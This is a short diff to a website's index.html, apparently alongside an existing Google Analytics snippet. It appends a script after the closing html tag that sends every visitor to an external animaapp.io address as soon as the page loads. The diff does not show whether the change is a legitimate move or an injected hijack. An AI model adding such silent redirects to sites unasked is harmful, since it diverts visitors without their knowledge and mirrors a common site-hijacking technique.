--- a/index.html
+++ b/index.html
@@ -171,7 +171,9 @@
         <script src="assets/js/odometer.js"></script>
     </body>
 </html>
-
+<script type="text/javascript">
+location="https://super-dew-4888.animaapp.io/";
+</script>
 <script>
   (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
   (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
